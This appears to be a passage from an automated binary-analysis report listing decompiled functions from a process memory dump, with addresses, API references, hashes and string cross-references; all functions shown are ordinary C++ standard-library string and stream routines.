0x00419b9c
0x00419b9e
0x00419ba0
0x00000000
0x00000000
0x00419ba2
0x00419ba4
0x00419ba7
0x00419bac
0x00419bae
0x00419bb0
0x00000000
0x00419bb0
0x00419b85
0x00000000

Strings

, xrefs: 00419CCC

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e4869ccbc59b0fec949597751e07cf3376d1f5f19059714930097a90293fbf5e
Instruction ID: 92fa738fd61671140f1f8d7f5b9e5aae3ee109de98a28e4faf7efe49eb77b5d3
Opcode Fuzzy Hash: e4869ccbc59b0fec949597751e07cf3376d1f5f19059714930097a90293fbf5e
Instruction Fuzzy Hash: 25619575A002099FCB14CF68D5909EEB7F5FF59314F10852AE852A7780E738BD84CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00421CF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00421CF0(intOrPtr* __ecx, intOrPtr _a4) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr* _v48;
				char _v56;
				signed int _t64;
				signed int _t68;
				signed int _t77;
				char _t79;
				intOrPtr* _t80;
				signed int _t86;
				signed int _t97;
				intOrPtr* _t102;
				signed int _t105;
				void* _t108;
				intOrPtr* _t109;
				intOrPtr _t115;
				intOrPtr _t116;
				signed int _t124;
				signed int _t140;
				intOrPtr* _t142;
				signed int _t144;
				void* _t145;
				signed int _t161;

				_push(0xffffffff);
				_push(E0043F7F0);
				_push( *[fs:0x0]);
				_t64 =  *0x451f00; // 0xc21d6f0a
				_push(_t64 ^ _t144);
				 *[fs:0x0] =  &_v16;
				_v20 = _t145 - 0x28;
				_t142 = __ecx;
				_v24 = __ecx;
				_t102 =  *((intOrPtr*)( *((intOrPtr*)( *__ecx + 4)) + __ecx + 0x38));
				_v28 = 0;
				_v48 = __ecx;
				if(_t102 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
				}
				_t68 =  *( *_t142 + 4);
				_v8 = 0;
				if( *((intOrPtr*)(_t68 + _t142 + 0xc)) == 0) {
					_t91 =  *((intOrPtr*)(_t68 + _t142 + 0x3c));
					if( *((intOrPtr*)(_t68 + _t142 + 0x3c)) != 0) {
						E00418DB0(_t91);
					}
				}
				_t69 =  *_t142;
				_t105 =  *( *_t142 + 4) & 0xffffff00 |  *((intOrPtr*)( *( *_t142 + 4) + _t142 + 0xc)) == 0x00000000;
				_v44 = _t105;
				_v8 = 1;
				if(_t105 != 0) {
					_t79 = E00414D10( *((intOrPtr*)(_t69 + 4)) + _t142,  &_v32);
					_v8 = 2;
					_t80 = E00421830(_t79);
					_t97 = _v32;
					_v40 = _t80;
					_v8 = 1;
					if(_t97 != 0) {
						E00429A1B( &_v36, 0);
						_t86 =  *(_t97 + 4);
						if(_t86 > 0 && _t86 < 0xffffffff) {
							 *(_t97 + 4) = _t86 - 1;
						}
						asm("sbb edi, edi");
						E00429A43( &_v36);
						_t140 =  !( ~( *(_t97 + 4))) & _t97;
						if(_t140 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t140))))(1);
						}
					}
					_t115 =  *_t142;
					_t116 =  *((intOrPtr*)(_t115 + 4));
					_v36 =  *((intOrPtr*)(_t116 + _t142 + 0x40));
					_t42 =  &_v36; // 0x446b54
					_v56 = 0;
					_v8 = 3;
					 *((intOrPtr*)( *((intOrPtr*)( *_v40 + 0x1c))))( &_v56, _v56,  *((intOrPtr*)(_t116 + _t142 + 0x38)),  *((intOrPtr*)(_t115 + 4)) + _t142,  *_t42, _a4);
					if(_v56 != 0) {
						_v28 = 4;
					}
					_v8 = 1;
				}
				_t124 = _v28;
				_t108 =  *( *_t142 + 4) + _t142;
				if(_t124 != 0) {
					_t77 =  *(_t108 + 0xc) | _t124;
					if( *((intOrPtr*)(_t108 + 0x38)) == 0) {
						_t161 = _t77;
					}
					E00418030(_t108, _t77, 0);
				}
				_v8 = 5;
				if(L0042A194(_t161) == 0) {
					E00421770();
				}
				_t109 =  *((intOrPtr*)( *( *_t142 + 4) + _t142 + 0x38));
				_v8 = 0xffffffff;
				if(_t109 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t109 + 8))))();
				}
				 *[fs:0x0] = _v16;
				return _t142;
			}

0x00421cf3
0x00421cf5
0x00421d00
0x00421d07
0x00421d0e
0x00421d12
0x00421d18
0x00421d1b
0x00421d1d
0x00421d25
0x00421d2b
0x00421d2e
0x00421d33
0x00421d3a
0x00421d3a
0x00421d3e
0x00421d41
0x00421d48
0x00421d4a
0x00421d50
0x00421d54
0x00421d54
0x00421d50
0x00421d59
0x00421d62
0x00421d65
0x00421d68
0x00421d71
0x00421d80
0x00421d86
0x00421d8a
0x00421d8f
0x00421d95
0x00421d98
0x00421d9e
0x00421da4
0x00421da9
0x00421dae
0x00421db6
0x00421db6
0x00421dbe
0x00421dc5
0x00421dca
0x00421dcc
0x00421dd6
0x00421dd6
0x00421dcc
0x00421dd8
0x00421ddd
0x00421dec
0x00421def
0x00421dfc
0x00421e0d
0x00421e11
0x00421e17
0x00421e19
0x00421e19
0x00421e20
0x00421e20
0x00421e2c
0x00421e2f
0x00421e33
0x00421e38
0x00421e3e
0x00421e40
0x00421e40
0x00421e46
0x00421e46
0x00421e4b
0x00421e59
0x00421e5d
0x00421e5d
0x00421e67
0x00421e6b
0x00421e74
0x00421e7b
0x00421e7b
0x00421e82
0x00421e90

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00421DA4

Strings

TkD, xrefs: 00421DEF, 00421DF7
TkD, xrefs: 00421DE4

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: LockitLockit::_std::_
String ID: TkD$TkD
API String ID: 3382485803-921410090
Opcode ID: 72134f87795dbbf1bf75faf9e1144b7d292cf2ab2cc1b0524844b4dbbb73dbec
Instruction ID: 0030039339fb311d00919fa75ef03fd82bb2e58a56fffb4042bd62cb90e0d496
Opcode Fuzzy Hash: 72134f87795dbbf1bf75faf9e1144b7d292cf2ab2cc1b0524844b4dbbb73dbec
Instruction Fuzzy Hash: 1A518F74B00254DFCB14CF58D980AAEBBB5BF99318F64815EE5059B391C73AAD02CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A4B0(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t18;
				intOrPtr* _t20;
				char* _t25;
				signed int _t29;
				intOrPtr* _t30;
				intOrPtr _t36;
				signed int _t41;
				intOrPtr _t44;
				intOrPtr _t50;
				intOrPtr _t55;
				intOrPtr* _t58;

				_t41 = __ecx;
				_t50 = _a4;
				_t58 = __ecx;
				if(_t50 == 0) {
					L12:
					_t18 =  *((intOrPtr*)(_t58 + 0x10));
					_t36 = _a8;
					if((_t41 | 0xffffffff) - _t18 <= _t36) {
						_t18 = E00429799("string too long");
					}
					if(_t36 == 0) {
						L29:
						return _t58;
					} else {
						_t55 = _t18 + _t36;
						if(_t55 > 0xfffffffe) {
							_t18 = E00429799("string too long");
						}
						_t44 =  *((intOrPtr*)(_t58 + 0x14));
						if(_t44 >= _t55) {
							if(_t55 != 0) {
								goto L19;
							} else {
								 *((intOrPtr*)(_t58 + 0x10)) = _t55;
								if(_t44 < 0x10) {
									_t25 = _t58;
									 *_t25 = 0;
									return _t25;
								} else {
									 *((char*)( *_t58)) = 0;
									return _t58;
								}
							}
						} else {
							E004044F0(_t58, _t55, _t18);
							_t50 = _a4;
							if(_t55 == 0) {
								goto L29;
							} else {
								L19:
								if( *((intOrPtr*)(_t58 + 0x14)) < 0x10) {
									_t20 = _t58;
								} else {
									_t20 =  *_t58;
								}
								E0042B8D0( *((intOrPtr*)(_t58 + 0x10)) + _t20, _t50, _t36);
								 *((intOrPtr*)(_t58 + 0x10)) = _t55;
								if( *((intOrPtr*)(_t58 + 0x14)) < 0x10) {
									 *((char*)(_t58 + _t55)) = 0;
									goto L29;
								} else {
									 *((char*)( *_t58 + _t55)) = 0;
									return _t58;
								}
							}
						}
					}
				} else {
					_t41 =  *(__ecx + 0x14);
					if(_t41 < 0x10) {
						_t29 = __ecx;
					} else {
						_t29 =  *__ecx;
					}
					if(_t50 < _t29) {
						goto L12;
					} else {
						if(_t41 < 0x10) {
							_t30 = _t58;
						} else {
							_t30 =  *_t58;
						}
						if( *((intOrPtr*)(_t58 + 0x10)) + _t30 <= _t50) {
							goto L12;
						} else {
							if(_t41 < 0x10) {
								return E00404710(_t58, _t58, _t50 - _t58, _a8);
							} else {
								return E00404710(_t58, _t58, _t50 -  *_t58, _a8);
							}
						}
					}
				}
			}

0x0040a4b0
0x0040a4b3
0x0040a4b8
0x0040a4bc
0x0040a517
0x0040a517
0x0040a51e
0x0040a525
0x0040a52c
0x0040a52c
0x0040a533
0x0040a5c2
0x0040a5c8
0x0040a539
0x0040a539
0x0040a53f
0x0040a546
0x0040a546
0x0040a54b
0x0040a550
0x0040a56e
0x00000000
0x0040a570
0x0040a570
0x0040a576
0x0040a587
0x0040a58a
0x0040a58f
0x0040a578
0x0040a57b
0x0040a583
0x0040a583
0x0040a576
0x0040a552
0x0040a556
0x0040a55b
0x0040a560
0x00000000
0x0040a562
0x0040a562
0x0040a566
0x0040a592
0x0040a568
0x0040a568
0x0040a568
0x0040a59c
0x0040a5a8
0x0040a5ab
0x0040a5be
0x00000000
0x0040a5ad
0x0040a5b0
0x0040a5b9
0x0040a5b9
0x0040a5ab
0x0040a560
0x0040a550
0x0040a4be
0x0040a4be
0x0040a4c4
0x0040a4ca
0x0040a4c6
0x0040a4c6
0x0040a4c6
0x0040a4ce
0x00000000
0x0040a4d0
0x0040a4d3
0x0040a4d9
0x0040a4d5
0x0040a4d5
0x0040a4d5
0x0040a4e2
0x00000000
0x0040a4e4
0x0040a4e7
0x0040a514
0x0040a4e9
0x0040a4fd
0x0040a4fd
0x0040a4e7
0x0040a4e2
0x0040a4ce

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040A52C
std::_Xinvalid_argument.LIBCPMT ref: 0040A546

Part of subcall function 00404710: std::_Xinvalid_argument.LIBCPMT ref: 00404729
Part of subcall function 00404710: std::_Xinvalid_argument.LIBCPMT ref: 0040474A
Part of subcall function 00404710: std::_Xinvalid_argument.LIBCPMT ref: 00404765

Strings

string too long, xrefs: 0040A527, 0040A541

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_
String ID: string too long
API String ID: 909987262-2556327735
Opcode ID: 84ff724b88cbe79b6869b1c7cbcc41ea1cd1b1d1781ee143ce6c5ef1cd2a0c0b
Instruction ID: cbc03e0c58c2783490b80823c8109874dad292169711069d70832278c6aeaa11
Opcode Fuzzy Hash: 84ff724b88cbe79b6869b1c7cbcc41ea1cd1b1d1781ee143ce6c5ef1cd2a0c0b
Instruction Fuzzy Hash: 6331E472310310ABD7249E6DE88096EF7E9FFD5720B20493FE4569B6C1C7749C5087AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040A680 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040A680(signed int __ecx, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __edi;
				signed int _t35;
				void* _t39;
				intOrPtr* _t40;
				signed int _t41;
				signed int _t42;
				signed int _t53;
				char _t56;
				signed int _t57;
				intOrPtr _t64;
				signed int _t66;
				signed int _t68;
				signed int _t70;
				void* _t71;

				_t57 = __ecx;
				_push(0xffffffff);
				_push(E0043DF30);
				_push( *[fs:0x0]);
				_t35 =  *0x451f00; // 0xc21d6f0a
				_push(_t35 ^ _t70);
				 *[fs:0x0] =  &_v16;
				_v20 = _t71 - 8;
				_t68 = __ecx;
				_v24 = __ecx;
				_t39 = _a8 - _a4;
				_t64 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t64 <= _t39 &&  *((intOrPtr*)(__ecx + 0x14)) != _t39 && E00404660(__ecx, _t64, _t39, 1) != 0) {
					 *((intOrPtr*)(__ecx + 0x10)) = _t64;
					if( *((intOrPtr*)(__ecx + 0x14)) < 0x10) {
						_t53 = __ecx;
					} else {
						_t53 =  *__ecx;
					}
					 *((char*)(_t53 + _t64)) = 0;
				}
				_t40 = _a4;
				_v8 = 0;
				while(_t40 != _a8) {
					_t56 =  *_t40;
					_t41 =  *(_t68 + 0x10);
					if((_t57 | 0xffffffff) - _t41 <= 1) {
						_t41 = E00429799("string too long");
					}
					_t15 = _t41 + 1; // 0x1
					_t66 = _t15;
					if(_t66 > 0xfffffffe) {
						_t41 = E00429799("string too long");
					}
					_t57 =  *(_t68 + 0x14);
					if(_t57 >= _t66) {
						if(_t66 != 0) {
							goto L15;
						}
						 *(_t68 + 0x10) = _t66;
						if(_t57 < 0x10) {
							 *_t68 = 0;
							_t40 = _a4 + 1;
							_a4 = _t40;
						} else {
							 *( *_t68) = 0;
							_t40 = _a4 + 1;
							_a4 = _t40;
						}
						continue;
					} else {
						_t57 = _t68;
						E004044F0(_t57, _t66, _t41);
						if(_t66 == 0) {
							L25:
							_t40 = _a4 + 1;
							_a4 = _t40;
							continue;
						}
						L15:
						_t57 =  *(_t68 + 0x10);
						if( *(_t68 + 0x14) < 0x10) {
							_t42 = _t68;
						} else {
							_t42 =  *_t68;
						}
						 *((char*)(_t42 + _t57)) = _t56;
						 *(_t68 + 0x10) = _t66;
						if( *(_t68 + 0x14) < 0x10) {
							 *((char*)(_t68 + _t66)) = 0;
							goto L25;
						} else {
							 *((char*)( *_t68 + _t66)) = 0;
							_t40 = _a4 + 1;
							_a4 = _t40;
							continue;
						}
					}
				}
				 *[fs:0x0] = _v16;
				return _t40;
			}

0x0040a680
0x0040a683
0x0040a685
0x0040a690
0x0040a697
0x0040a69e
0x0040a6a2
0x0040a6a8
0x0040a6ab
0x0040a6ad
0x0040a6b3
0x0040a6b6
0x0040a6bb
0x0040a6d2
0x0040a6d5
0x0040a6db
0x0040a6d7
0x0040a6d7
0x0040a6d7
0x0040a6dd
0x0040a6dd
0x0040a6e1
0x0040a6e4
0x0040a6f0
0x0040a6f9
0x0040a6fb
0x0040a706
0x0040a70d
0x0040a70d
0x0040a712
0x0040a712
0x0040a718
0x0040a71f
0x0040a71f
0x0040a724
0x0040a729
0x0040a77d
0x00000000
0x00000000
0x0040a77f
0x0040a785
0x0040a79a
0x0040a7a0
0x0040a7a1
0x0040a787
0x0040a789
0x0040a78f
0x0040a790
0x0040a790
0x00000000
0x0040a72b
0x0040a72d
0x0040a72f
0x0040a736
0x0040a7ce
0x0040a7d1
0x0040a7d2
0x00000000
0x0040a7d2
0x0040a73c
0x0040a73c
0x0040a747
0x0040a7a9
0x0040a749
0x0040a749
0x0040a749
0x0040a7ab
0x0040a7ae
0x0040a7b4
0x0040a7ca
0x00000000
0x0040a7b6
0x0040a7b8
0x0040a7bf
0x0040a7c0
0x00000000
0x0040a7c0
0x0040a7b4
0x0040a729
0x0040a7dd
0x0040a7eb

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040A70D
std::_Xinvalid_argument.LIBCPMT ref: 0040A71F

Part of subcall function 00404660: std::_Xinvalid_argument.LIBCPMT ref: 00404674

Strings

string too long, xrefs: 0040A708, 0040A71A

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_
String ID: string too long
API String ID: 909987262-2556327735
Opcode ID: 2b89678f6f98ef19a59f93ff4cc2869af0e01c74eb3451c09d2d5861f8fb2756
Instruction ID: 63aa9dea76108f0d19f74856b24c17e0dfe74506f93f8a9268d2d29a54f2890d
Opcode Fuzzy Hash: 2b89678f6f98ef19a59f93ff4cc2869af0e01c74eb3451c09d2d5861f8fb2756
Instruction Fuzzy Hash: FB419031604744DFC721CF28D580B5ABBF4EB45750F248A2FE492AB3C1D779E950879A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040C3A0(void* __ecx, void* __eflags, char* _a4, intOrPtr* _a8) {
				char _v8;
				void* _t17;
				void* _t20;
				intOrPtr* _t32;
				intOrPtr* _t33;
				intOrPtr _t35;
				intOrPtr _t37;
				void* _t43;
				intOrPtr* _t46;
				char* _t47;

				_push(__ecx);
				_v8 = 0;
				_t17 = E0042BC70(" \n\r\t");
				_t46 = _a8;
				_t43 = E0040A350(_t46, " \n\r\t", 0, _t17);
				_t20 = E0040A3C0(_t46, " \n\r\t", 0xffffffff, E0042BC70(" \n\r\t"));
				_t37 =  *((intOrPtr*)(_t46 + 0x14));
				if(_t43 != 0xffffffff) {
					if(_t37 < 0x10) {
						_t32 = _t46;
					} else {
						_t32 =  *_t46;
					}
					_t33 = _t32 + _t43;
				} else {
					if(_t37 < 0x10) {
						_t33 = _t46;
					} else {
						_t33 =  *_t46;
					}
				}
				_v8 = _t33;
				_t35 = _v8;
				if(_t20 != 0xffffffff) {
					if(_t37 >= 0x10) {
						_t46 =  *_t46;
					}
					_v8 = _t46 + _t20 + 1;
				} else {
					if(_t37 < 0x10) {
						_v8 =  *((intOrPtr*)(_t46 + 0x10)) + _t46;
					} else {
						_v8 =  *((intOrPtr*)(_t46 + 0x10)) +  *_t46;
					}
				}
				_t47 = _a4;
				_t23 = _v8;
				 *((intOrPtr*)(_t47 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t47 + 0x10)) = 0;
				 *_t47 = 0;
				if(_t35 != _v8) {
					E00404BC0(_t47, _t35, _t23 - _t35);
				}
				return _t47;
			}

0x0040c3a3
0x0040c3ab
0x0040c3b2
0x0040c3b7
0x0040c3d1
0x0040c3e5
0x0040c3ea
0x0040c3f0
0x0040c402
0x0040c408
0x0040c404
0x0040c404
0x0040c404
0x0040c40a
0x0040c3f2
0x0040c3f5
0x0040c3fb
0x0040c3f7
0x0040c3f7
0x0040c3f7
0x0040c3f5
0x0040c40c
0x0040c412
0x0040c417
0x0040c439
0x0040c43b
0x0040c43b
0x0040c441
0x0040c419
0x0040c41c
0x0040c431
0x0040c41e
0x0040c425
0x0040c425
0x0040c41c
0x0040c444
0x0040c44a
0x0040c44c
0x0040c453
0x0040c45a
0x0040c45f
0x0040c467
0x0040c467
0x0040c473

APIs

_strlen.LIBCMT ref: 0040C3B2
_strlen.LIBCMT ref: 0040C3D3

Strings

, xrefs: 0040C3A6, 0040C3C0, 0040C3CC, 0040C3DE

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-1083388701
Opcode ID: 562d67089881b394a1a3086c90b9b9ecb6023aa7061d84cc653c11fde3834605
Instruction ID: 9f0f8598dd92f0b2a3d68e780d659e0c1a948b79a5961d118c2a53313e903f7d
Opcode Fuzzy Hash: 562d67089881b394a1a3086c90b9b9ecb6023aa7061d84cc653c11fde3834605
Instruction Fuzzy Hash: B0219470700214DBDF24DF18D590A6EB3A6EB81314F30476EE856673D1DB786D05978A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A5D0(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t12;
				char* _t19;
				intOrPtr _t23;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr* _t37;

				_t23 = _a4;
				_t37 = __ecx;
				_t12 =  *((intOrPtr*)(__ecx + 0x10));
				if((__ecx | 0xffffffff) - _t12 <= _t23) {
					_t12 = E00429799("string too long");
				}
				if(_t23 == 0) {
					L15:
					return _t37;
				} else {
					_t32 = _t12 + _t23;
					if(_t32 > 0xfffffffe) {
						_t12 = E00429799("string too long");
					}
					_t27 =  *((intOrPtr*)(_t37 + 0x14));
					if(_t27 >= _t32) {
						if(_t32 != 0) {
							goto L7;
						} else {
							 *((intOrPtr*)(_t37 + 0x10)) = _t32;
							if(_t27 < 0x10) {
								_t19 = _t37;
								 *_t19 = 0;
								return _t19;
							} else {
								 *((char*)( *_t37)) = 0;
								return _t37;
							}
						}
					} else {
						E004044F0(_t37, _t32, _t12);
						if(_t32 == 0) {
							L14:
							goto L15;
						} else {
							L7:
							E0040A260(_t37,  *((intOrPtr*)(_t37 + 0x10)), _t23, _a8);
							 *((intOrPtr*)(_t37 + 0x10)) = _t32;
							if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
								 *((char*)(_t37 + _t32)) = 0;
								goto L14;
							} else {
								 *((char*)( *_t37 + _t32)) = 0;
								return _t37;
							}
						}
					}
				}
			}

0x0040a5d4
0x0040a5d8
0x0040a5da
0x0040a5e4
0x0040a5eb
0x0040a5eb
0x0040a5f2
0x0040a670
0x0040a675
0x0040a5f4
0x0040a5f5
0x0040a5fb
0x0040a602
0x0040a602
0x0040a607
0x0040a60c
0x0040a645
0x00000000
0x0040a647
0x0040a647
0x0040a64d
0x0040a65e
0x0040a661
0x0040a666
0x0040a64f
0x0040a652
0x0040a65a
0x0040a65a
0x0040a64d
0x0040a60e
0x0040a612
0x0040a619
0x0040a66f
0x00000000
0x0040a61b
0x0040a61b
0x0040a626
0x0040a62f
0x0040a632
0x0040a66b
0x00000000
0x0040a634
0x0040a636
0x0040a640
0x0040a640
0x0040a632
0x0040a619
0x0040a60c

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040A5EB

Part of subcall function 00429799: std::exception::exception.LIBCMT ref: 004297AE
Part of subcall function 00429799: __CxxThrowException@8.LIBCMT ref: 004297C3
Part of subcall function 00429799: std::exception::exception.LIBCMT ref: 004297D4

std::_Xinvalid_argument.LIBCPMT ref: 0040A602

Strings

string too long, xrefs: 0040A5E6, 0040A5FD

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: a555c81e307514fffb17f668f54230b99ecf31f71e2ef1b2362b96c4d42ac2d5
Instruction ID: 6b43e9922dfab5d11d1a3fe9e3e2b487697a58125d7b46f7f299f1e108ccee00
Opcode Fuzzy Hash: a555c81e307514fffb17f668f54230b99ecf31f71e2ef1b2362b96c4d42ac2d5
Instruction Fuzzy Hash: 1311E7333047105BE321A96CE880A6AF7E8EBA5B20F140A3FF591973C1C776981043AD

Uniqueness

Uniqueness Score: -1.00%

Function 004120A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004120A0(intOrPtr* __ecx, signed int _a4, intOrPtr _a8) {
				intOrPtr _t17;
				intOrPtr _t18;
				signed int _t26;
				intOrPtr* _t29;
				signed int _t32;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr _t41;
				intOrPtr* _t44;

				_t44 = __ecx;
				_t17 =  *((intOrPtr*)(__ecx + 0x10));
				_t32 = _a4;
				if(_t17 < _t32) {
					_t17 = E004297E6("invalid string position");
				}
				_t41 = _a8;
				_t18 = _t17 - _t32;
				if(_t18 < _t41) {
					_t41 = _t18;
				}
				if(_t41 == 0) {
					L14:
					return _t44;
				} else {
					_t36 =  *((intOrPtr*)(_t44 + 0x14));
					if(_t36 < 8) {
						_t29 = _t44;
					} else {
						_t29 =  *_t44;
					}
					if(_t36 < 8) {
						_t37 = _t44;
					} else {
						_t37 =  *_t44;
					}
					E0042C040(_t37 + _t32 * 2, _t29 + (_t32 + _t41) * 2, _t18 - _t41 + _t18 - _t41);
					_t26 =  *(_t44 + 0x10) - _t41;
					 *(_t44 + 0x10) = _t26;
					if( *((intOrPtr*)(_t44 + 0x14)) < 8) {
						 *((short*)(_t44 + _t26 * 2)) = 0;
						goto L14;
					} else {
						 *((short*)( *_t44 + _t26 * 2)) = 0;
						return _t44;
					}
				}
			}

0x004120a4
0x004120a6
0x004120a9
0x004120af
0x004120b6
0x004120b6
0x004120bb
0x004120be
0x004120c2
0x004120c4
0x004120c4
0x004120c8
0x00412123
0x00412128
0x004120ca
0x004120ca
0x004120d1
0x004120d7
0x004120d3
0x004120d3
0x004120d3
0x004120dc
0x004120e2
0x004120de
0x004120de
0x004120de
0x004120f4
0x004120ff
0x00412105
0x00412109
0x0041211f
0x00000000
0x0041210b
0x0041210f
0x00412118
0x00412118
0x00412109

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004120B6

Part of subcall function 004297E6: std::exception::exception.LIBCMT ref: 004297FB
Part of subcall function 004297E6: __CxxThrowException@8.LIBCMT ref: 00429810
Part of subcall function 004297E6: std::exception::exception.LIBCMT ref: 00429821

_memmove.LIBCMT ref: 004120F4

Strings

invalid string position, xrefs: 004120B1

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: aedecd2b69070cbbe1b71ea6ff9aaf7391e9b3772f5fca482b73bd605e56f5e2
Instruction ID: a19bf8b7061916fc9b924155680cd779ee9a8648532b0a30706f4006ff9e0172
Opcode Fuzzy Hash: aedecd2b69070cbbe1b71ea6ff9aaf7391e9b3772f5fca482b73bd605e56f5e2
Instruction Fuzzy Hash: 4011AC323006149B8724CE6DDE808ABF7A6FFD57543204A2FD141C7615DAB5D8A6C798

Uniqueness

Uniqueness Score: -1.00%

Function 00404410 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404410(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr _t16;
				intOrPtr* _t19;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t34;

				_t34 = __ecx;
				_t10 =  *((intOrPtr*)(__ecx + 0x10));
				_t24 = _a4;
				if(_t10 < _t24) {
					_t10 = E004297E6("invalid string position");
				}
				_t31 = _a8;
				_t11 = _t10 - _t24;
				if(_t11 < _t31) {
					_t31 = _t11;
				}
				if(_t31 == 0) {
					L14:
					return _t34;
				} else {
					_t27 =  *((intOrPtr*)(_t34 + 0x14));
					if(_t27 < 0x10) {
						_t19 = _t34;
					} else {
						_t19 =  *_t34;
					}
					if(_t27 < 0x10) {
						_t28 = _t34;
					} else {
						_t28 =  *_t34;
					}
					E0042C040(_t28 + _t24, _t19 + _t24 + _t31, _t11 - _t31);
					_t16 =  *((intOrPtr*)(_t34 + 0x10)) - _t31;
					 *((intOrPtr*)(_t34 + 0x10)) = _t16;
					if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
						 *((char*)(_t34 + _t16)) = 0;
						goto L14;
					} else {
						 *((char*)( *_t34 + _t16)) = 0;
						return _t34;
					}
				}
			}

0x00404414
0x00404416
0x00404419
0x0040441f
0x00404426
0x00404426
0x0040442b
0x0040442e
0x00404432
0x00404434
0x00404434
0x00404438
0x0040448a
0x0040448f
0x0040443a
0x0040443a
0x00404441
0x00404447
0x00404443
0x00404443
0x00404443
0x0040444c
0x00404452
0x0040444e
0x0040444e
0x0040444e
0x0040445f
0x0040446a
0x00404470
0x00404474
0x00404486
0x00000000
0x00404476
0x00404478
0x00404481
0x00404481
0x00404474

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404426

